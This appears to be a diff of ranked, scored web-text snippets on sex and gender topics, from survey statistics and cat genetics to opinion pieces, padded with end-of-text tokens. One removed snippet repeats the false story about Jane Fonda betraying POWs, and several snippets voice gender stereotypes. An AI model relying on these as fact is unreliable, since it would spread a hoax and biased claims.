advantage.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The study also provides other interesting insights about what different couples do in bed: + +Women who reported to be ‘homosexual or bisexual’ were more likely to have had anal sex with an opposite-sex partner (44.2%) compared with 35.4% of heterosexual women. + +More women in the ‘homosexual or bisexual’ group had ever had opposite-sex sexual contact (89.7%), as compared to men (67.9%). + +And surprisingly, or not, 16.4% of women and 11.4% of men who had identified as ‘homosexual or bisexual’ had never had same-sex sexual contact.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 9; Score = 425984.0 -<|begin_of_text|>A connection between lesbian lust and identifying as male came to me after reading the prologue to Audre Lorde’s Zami : A New Spelling of My Name (full text here.) Lorde describes wanting to be both male and female and she fantasized about having a penis. It’s increasingly common for lesbians to think they are men so I think this needs to be discussed. In this post I’m going to describe my interpretation of Lorde’s quote, which was written in 1982, and then discuss the phenomenon of lesbians feeling “male” within the current context of porn culture and transgenderism. +Rank = 10; Score = 197632.0 +<|begin_of_text|>What’s happening to female characters in video games? They’ve been around forever and they’ve seen the changes of growing technology and differing trends, but it never felt like they ever truly lost anything. They simply grew with the stories and games, maybe became a little more numerous as games started including more characters and options. Recently though, they have changed. Not due to the natural evolution of the medium, but seemingly due to this idea rooted in the stereotype that only dudes game, and because only dudes game, the only way we can view female characters is through the eyes of guys. And thus while male characters are perfectly allowed to remain muscle-bound, stoic, and badass, women must be “realistic” because otherwise guys might get the wrong idea. -“I have always wanted to be both man and woman, to incorporate the strongest and richest parts of my mother and father within/into me—to share valleys and mountains upon my body the way the earth does in hills and peaks. I would like to enter a woman the way any man can, and to be entered—to leave and to be left—to be hot and hard and soft all at the same time in the cause of our loving. I would like to drive forward and at other times to rest or be driven. When I sit and play in the waters of my bath I love to feel the deep inside parts of me, sliding and folded and tender and deep. Other times I like to fantasize the core of it, my pearl, a protruding part of me, hard and sensitive and vulnerable in a different way. I have felt the age-old triangle of mother father and child, with the “I” at its eternal core, elongate and flatten out into the elegantly strong triad of grandmother mother daughter, with the “I” moving back and forth flowing in either or both directions as needed. Woman forever. My body, a living representation of other life older longer wiser. The mountains and valleys, trees, rocks. Sand and flowers and water and stone. Made in earth.”-Audre Lorde +Now, aside from the fact that this is pretty insulting to the intelligence and motivations of men, it’s a little bizarre for the same people who want more women in the industry and enjoying video games to perpetually only address things from a strictly male perspective. A purely negative perspective at that, assuming only the very worst outlook from male gamers. Never have I seen from the arguments saying female characters need to change any reference to what women want in female characters. Which is a shame, because if we did, those characters wouldn’t change much. Because, objectively, there is enough diversity in how female characters present themselves that I believe most of the women who play are happy with it. -This quote is rather poetic and I have allowed myself to see lots of things in it that I don’t know if Lorde actually intended. These are some things I see when I look at these words. +The argument has already been made that men tend to be just as sexy and unrealistic as women when it comes to video games. And the usual rebuttal is “That’s just a male power fantasy.” Consider, maybe, that the sexy but deadly female heroine might be just as much a female power fantasy. Or the not-so-sexy but kind and passionate young girl who always strives to improve the lives of others. Or the badass female space marine fighting for her home. Has it occurred to no one making the argument against sexy characters that women have just as much of a need to fantasize—to become someone who is so unlike them, and yet, seems to hold the same values? Or even to become someone completely different from them just to unwind and forget life for a few hours? -Lorde has described wanting the best qualities of her mother and father and wanting to be both hard and soft during sex. When I read this I thought about how people are expected to limit their self-expression and interests to what society believes is appropriate for their sex, and Lorde is refusing to limit herself that way. She wants the full human experience, not just a half of it. Gender roles and +Speaking as a woman, I don’t play games for their realism. I don’t mind if a game embraces a little realism, as long as they’re still clearly rooted in fiction. I am especially partial to fantasy, and whether it’s a character I have made completely from scratch for a pen and paper roleplay, or a character ================================================================================ -Rank = 10; Score = 413696.0 -<|begin_of_text|>Nasa +Rank = 11; Score = 197632.0 +<|begin_of_text|>Utah’s Wasatch GOP has two chairmen. One of them is named James C. Green. Mr. Green has some big ideas and he decided to share one of those big ideas with the public. -Mycorrhizal fungi are more like cities than individual plants; these are complex systems which stretch for miles underground in search for nutrients. +Here’s Mr. Green’s caveman missive: -So massive and impactful are they, Nasa has now been able to identify them from space. +Equal Pay For Women Has Consequences -Advertisement +Editor: Here's the problem with the Equal Pay bill being considered by the Utah Legislature... Traditionally men have earned more than women in the workplace because they are considered the primary breadwinners for families. They need to make enough to support their families and allow the Mother to remain in the home to raise and nurture the children. -Researchers say it could finding and studying these networks could help them predict how climate change will affect forest ecosystems. "Individual tree species have unique spectral fingerprints," said Joshua Fisher, lead author of the study. "But we thought the underlying fungi could be controlling them as groups." +If businesses are forced to pay women the same as male earnings, that means they will have to reduce the pay for the men they employ... simple economics. If that happens, then men will have an even more difficult time earning enough to support their families, which will mean more Mothers will be forced to leave the home (where they may prefer to be) to join the workforce to make up the difference. -Two types of the fungi control different sets of trees, with each type responding differently to climate change. Knowing where each type is dominant "may help us predict where forests will thrive in the future and where they'll falter", the team says. +And as even more women thus enter the workforce that creates more competition for jobs (even men's jobs) and puts further downward pressure on the pay for all jobs... meaning more and more Mothers will be forced into the workforce. And that is bad for families and thus for all of society. -Ceating fungi maps to chart this growth has proved difficult, as it has traditionally depended on "counting individual tree species". So the team decided to detect the network via satellite. +It's a vicious cycle that only gets worse the more equality of pay is forced upon us. It's a situation of well-meaning intentions, but negative unintended consequences. -Using the "spectral signature" of the trees -- that is, the pattern that the tree's canopies reflect -- the satellite can differentiate between the trees. Four forests were analysed during the project -- around 130,000 trees and 77 species -- by Nasa's Landsat-5 satellite. The images were then analysed using a statistical model that was able to predict where the different types of fungus were most prevalent. This model, the team say, had around 77 percent accuracy. "That these below-ground agents manifest themselves in changes in the forest canopies is significant," said Fisher. "This allows, for the first time, some light to be shed on their hidden processes."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +We should encourage our Legislators to drop the whole notion. Let the marketplace determine what free-market forces should prevail. It is not the role of government to dictate to businesses what they should pay anyway... either as a Minimum Wage or Equal Pay for men and women. + +James C. Green + +Wasatch Co. GOP Vice-Chair<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 11; Score = 387072.0 +Rank = 12; Score = 192512.0 <|begin_of_text|>Men and women make moral decisions differently, according to new research published in Personality and Social Psychology Bulletin — but not necessarily in the ways scientists thought before. The study, a meta-analysis of 40 studies with 6,100 total participants, revealed a more nuanced distinction between two common schools of moral thought. @@ -185,77 +212,113 @@ When asked a moral dilemma question that did not involve harm, women and men bot “The current findings ================================================================================ -Rank = 12; Score = 380928.0 -<|begin_of_text|>Government is a big insurance company. Except you can’t shop elsewhere for insurance. And their price is super high. And they threaten you if you don’t want to pay them. And the services they deliver are sub-par for the price. And you can’t itemize your “insurance” to only include the products you need. And often just when you need them most, you find out how incompetent, corrupt, and overall ineffective they are at ensuring you against anything. +Rank = 13; Score = 185344.0 +<|begin_of_text|>Posted by Chewy -Just look at Puerto Rico after Hurricane Maria. Governments play politics with awarding repair projects, while the majority of the island is still left without power. Daddy Yankee was a bigger help than FEMA. +You’ve always assumed the calico cat that sits in your neighbor’s window is a she. And you’re certain that the orange tabby you’ve fallen in love with at the shelter is a boy. Chances are, you’re right. Most orange cats are male and most calicos are female. -And because the government really doesn’t deliver on their promise of keeping people safe and coming to their aid, people still turn to private companies. People still find it in their best interest to use some of the 50% of their income left after the government plunders the rest to purchase insurance. +The color of a cat’s coat is closely linked to its gender. As you may recall from high school biology, mammals have two chromosomes that determine their sex—XX for females and XY for males. But a number of additional chromosomes are present and vary depending upon species, says Dr. Robert Grahn, a forensic analyst at the veterinary genetics laboratory at the University of California in Davis. -You pay property taxes, and these go to support indoctrination centers also known as public schools. They pay for local roads, local traffic enforcers, and firefighters. But these services are collectivized. The firefighters aren’t really there to save your home, they are there to keep the whole town from burning down. +“These other chromosomes contain genes that affect hair color, pattern, shape and length,” Grahn says. “Since the genes for sex and hair colors are on different chromosomes, they are inherited independently of each other. Thus, no color is associated with a particular sex, except in cats and hamsters.” -Firefighters are likely some of the most dedicated public employees. The ones I have met often go into the profession for the right reasons, and take seriously their commitment to saving lives. Many are even volunteers. But still, they can only show up after they have been called. Many bravely rescue people from serious situations. But rarely is a structure saved. +Nature doesn’t always abide by a rigid set of rules, however, including when it comes to feline fur color. A small percentage of orange cats are female, and even a more miniscule portion of calico cats are male. -That is where private insurance comes in. You purchase private home insurance so that in the event that your home burns down, you don’t lose all the money that has gone into it. But some companies go above and beyond when you purchase insurance from them. +Below, learn how genetics and sex influences a cat’s coat color, and why some cats don’t fit typical color patterns. -Increasingly, insurance carriers are finding wildfires, such as those in California, are an opportunity to provide protection beyond what most people get through publicly funded fire fighting. Some insurers say they typically get new customers when homeowners see the special treatment received by neighbors during big fires. “The enrollment has taken off dramatically over the years as people have seen us save homes,” Paul Krump, a senior executive at Chubb, said of the insurer’s Wildfire Defense Services. “It’s absolutely growing leaps and bounds.” +Color in Cats is (Mostly) Linked to Sex -Chubb provides extra protection to the homes they insure in certain zip codes that are prone to wildfires. They get private firefighters on the scene before the building +Whether calico, tortoiseshell, orange, black, brown, or gray, a cat’s fur color is derived from two dominant colors: Black and red. These colors can mutate into different shades—black can become chocolate, cinnamon, lilac, blue and fawn. And red, which is determined by the orange gene, can become cream. + +The color genes for black and red in cats are contained within the X chromosome. This is the same chromosome that, along with Y in males, determine a cat’s sex, says Dr. Jerold Bell, adjunct professor of genetics at Cummings School of Veterinary Medicine at Tufts University in North Grafton, Massachusetts. + +“They are actually alleles, meaning they are two variations of the same gene in one location on the chromosome,” he says. So an X chromosome can contain either a black hair gene or an orange hair gene, but not both. + +“One allele will create orange coloration. This allele will cover up all other colors, except pure white. The other allele will create a non-orange coloration. This allele is ‘recessive’ and allows for ================================================================================ -Rank = 13; Score = 380928.0 -<|begin_of_text|>Are young men giving up on women and checking out of society? That was a question recently posed in two articles (article 1 and article 2), which commented on the global trend of young adult males who are retreating into porn, video games, and lad culture. These articles resonated with so many readers that they garnered over 500 comments from men. People even took to Twitter, Facebook, and YouTube to share in the conversation. While there was much talk about the problem, there was little talk about the solution, which bothered me as a mother of three daughters who is concerned about their prospects for relating to the opposite sex, as they grow older. So, I’d like to share some advice in an attempt towards bringing healing and unity between the sexes. +Rank = 14; Score = 179200.0 +<|begin_of_text|>Nasa -Stalemate: The Current State of Affairs in the War Of The Sexes +Mycorrhizal fungi are more like cities than individual plants; these are complex systems which stretch for miles underground in search for nutrients. -Popular culture tells us that the cause of the war between the sexes is patriarchal and misogynistic men. As a result, we now have women engaging in lesbianized third-wave feminism. In this most recent wave, we have women who throw tampons and condoms at government buildings or show up angry and bare-breasted in order to protest for the right to kill their own children. As ridiculous as that sounds, it’s just one example of what they’re doing, and it is why many women like myself want NOTHING to do with the feminist movement. We don’t identify with the victim mentality. We don’t believe that our own empowerment will be found and maintained by disempowering men or our own children. +So massive and impactful are they, Nasa has now been able to identify them from space. -Although there are many women who believe like me, many college age students today are getting lessons on feminism or are being required to take mandatory consent classes for dating. Some say that college age men today are completely clueless or scared about how to engage with women. There is a fear of being accused of rape, along with a fear of court and educational systems that seemingly give women preferential treatment. +Advertisement -"I'm an athlete. My parents have a lot of money. I have plenty of friends and a good social life. I don't hang out with women any more. Occasionally I'll have one night stands, but mostly I fill my time with other things. I got accused of molesting a girl at college and since then I've just thought, whatever. I play sports instead." ~ Francis, 28 +Researchers say it could finding and studying these networks could help them predict how climate change will affect forest ecosystems. "Individual tree species have unique spectral fingerprints," said Joshua Fisher, lead author of the study. "But we thought the underlying fungi could be controlling them as groups." -Not only is this lifestyle pervading the United States and Great Britain, but also Japan where so-called ‘herbivores’ (translated as grass-eating boys) are not +Two types of the fungi control different sets of trees, with each type responding differently to climate change. Knowing where each type is dominant "may help us predict where forests will thrive in the future and where they'll falter", the team says. + +Ceating fungi maps to chart this growth has proved difficult, as it has traditionally depended on "counting individual tree species". So the team decided to detect the network via satellite. + +Using the "spectral signature" of the trees -- that is, the pattern that the tree's canopies reflect -- the satellite can differentiate between the trees. Four forests were analysed during the project -- around 130,000 trees and 77 species -- by Nasa's Landsat-5 satellite. The images were then analysed using a statistical model that was able to predict where the different types of fungus were most prevalent. This model, the team say, had around 77 percent accuracy. "That these below-ground agents manifest themselves in changes in the forest canopies is significant," said Fisher. "This allows, for the first time, some light to be shed on their hidden processes."<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 15; Score = 177152.0 +<|begin_of_text|>I’m a female scientist, and I agree with Tim Hunt. + +Allie Rubin Blocked Unblock Follow Following Jun 13, 2015 + +Nobel Prize winner Sir Tim Hunt recently caused a stir when he argued that male and female scientists should work independently, because women are a distraction to men in the lab. At a conference, he was quoted as saying, “Let me tell you about my trouble with girls… three things happen when they are in the lab… You fall in love with them, they fall in love with you and when you criticize them, they cry.” + +As improbable as it might sound, I am a female scientist, and I agree with Tim Hunt. + +First of all, Sir Tim’s comments are based on his personal experiences, and are therefore incontrovertible. Three hundred and fifty years ago, Isaac Newton saw an apple fall and decided that gravity existed. Three weeks ago, Tim Hunt saw a woman cry and decided that all women are unfit to be scientists. Science is based on observations, which are the same thing as universal proof. Even I know that, and I’m just a woman whose brain is filled to capacity with yoga poses and recipes for gluten-free organic soap. Once, I was lured into a trap in the woods because I followed a trail of Sex and the City DVDs for three miles into a covered pit. Do you really think I could do something as complicated as thinking about science? + +Second, Tim Hunt is correct in asserting that women are distracting to men in a lab setting, which greatly affects their productivity. Last month, my labmates and I had to burn our female coworker at the stake for witchcraft because we saw her holding an unwrapped tampon. Between building the stake, lighting an adequate fire, and waiting for her to die, we lost an entire day that we could otherwise have spent working. I make every effort to not distract my male colleagues; sometimes I have to work on my astrology charts from home when I’m menstruating or have leprosy, just so I can let the men in my lab focus on doing real science. It’s a small sacrifice I make that keeps morale in the lab way up. + +Tim Hunt also mentions that men and women are constantly falling in love with each other within the lab. This is true; I used to identify as homosexual before working with a group of bearded men and a set of phallic pipettes turned me straight. Once that happened, I couldn’t stop falling in love with every man I met. One time I fell ================================================================================ -Rank = 14; Score = 372736.0 -<|begin_of_text|>Uploaded by jonbone17 on Feb 18, 2007 +Rank = 16; Score = 177152.0 +<|begin_of_text|>‘Women hate women. That’s what I think,’ says pop star crowned Billboard’s woman of the year – and once photographed in Trump’s bed -An inside look at Hoa Lo Prison, which American POWs nicknamed “Hanoi Hilton” in the 1960s +Madonna has described her feelings of “heartbreak” and “betrayal” in the wake of Donald Trump’s US election win, claiming: “It feels like women betrayed us.” -He spat at Ms. Fonda, was clubbed, and was dragged away. During the subsequent beating, he fell forward on to the camp Commandant ‘s feet, which sent that officer berserk. +During her interview with Billboard, which has crowned her Woman of the Year, the pop star compared her despair regarding the results – particularly the significant number of women who voted for Trump – to mourning. -In 1978, the Air Force Colonel still suffered from double vision (which permanently ended his flying career) from the Commandant’s frenzied application of a wooden baton. +Why did women vote for Trump? Because misogyny is not a male-only attribute Read more -From 1963-65, Col. Larry Carrigan was in the 47FW/DO (F-4E’s). He spent 6 years in the ‘ Hanoi Hilton’…the first three of which his family only knew he was ‘missing in action’. His wife lived on faith that he was still alive. His group, too, got the cleaned-up, fed and clothed routine in preparation for a ‘peace delegation’ visit. +“I feel that way every morning; I wake up and say, ‘Oh, wait, Donald Trump is still the president,’ and it wasn’t a bad dream that I had. It feels like women betrayed us. The percentage of women who voted for Trump was insanely high,” she says. -They, however, had time and devised a plan to get word to the world that they were alive and still survived. Each man secreted a tiny piece of paper, with his Social Security Number on it, in the palm of his hand. When paraded before Ms. Fonda and a cameraman, she walked the line, shaking each man’s hand and asking little encouraging snippets like: ‘Aren’t you sorry you bombed babies?’ and ‘Are you grateful for the humane treatment from your benevolent captors?’ Believing this HAD to be an act, they each palmed her their sliver of paper. +When asked why she thought so many women – according to CNN 53% of white women voted for Trump – Madonna replied: -She took them all without missing a beat.. At the end of the line and once the camera stopped rolling, to the shocked disbelief of the POWs, she turned to the officer in charge and handed him all the little pieces of paper… +Women hate women. That’s what I think it is. Women’s nature is not to support other women. It’s really sad. Men protect each other, and women protect their men and children. Women turn inward and men are more external. A lot of it has do with jealousy and some sort of tribal inability to accept that one of their kind could lead a nation. Other people just didn’t bother to vote because they didn’t like either candidate, or they didn’t think Trump had a chance in the world. They took their hands off the wheel and then the car crashed. -Three men died from the subsequent beatings. Colonel Carrigan was almost number four but he survived, which is the only reason we know of her actions that day. +Earlier this week, Madonna criticised Trump and said she was ashamed to be an American during a performance and auction that raised more than $7.5m (£5.9m) for her Malawi foundation. -I was a civilian economic development advisor in Vietnam, and was captured by the North Vietnamese communists in South Vietnam in 1968, and held prisoner for over 5 years. +Images of the president-elect appeared behind her as she sang the lyrics to Britney Spears’s Toxic. -I spent 27 months in solitary confinement; one year in a cage in Cambodia ; and one year in a ‘black box’ in Hanoi. My North Vietnamese captors deliberately poisoned and murdered a female missionary, a nurse in a leprosarium in Banme Thuot, South +The singer also revealed that she had previously been photographed in Trump’s bed – for a magazine shoot when he was not at home. She made jokes about his “cheap sheets”, saying: “They won’t be Egyptian cotton because we all know how he feels about Muslims, don’t we?”<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> ================================================================================ -Rank = 15; Score = 372736.0 -<|begin_of_text|>Female American athletes get less coverage in the media due to gender bias and instead what attention they get focuses more on attire, or how attractive, sexy or ladylike they are, write Emily Kaskan and Ivy Ho of the University of Massachusetts Lowell in Sex Roles, an interdisciplinary behavioral science journal offering a feminist perspective. +Rank = 17; Score = 176128.0 +<|begin_of_text|>Are young men giving up on women and checking out of society? That was a question recently posed in two articles (article 1 and article 2), 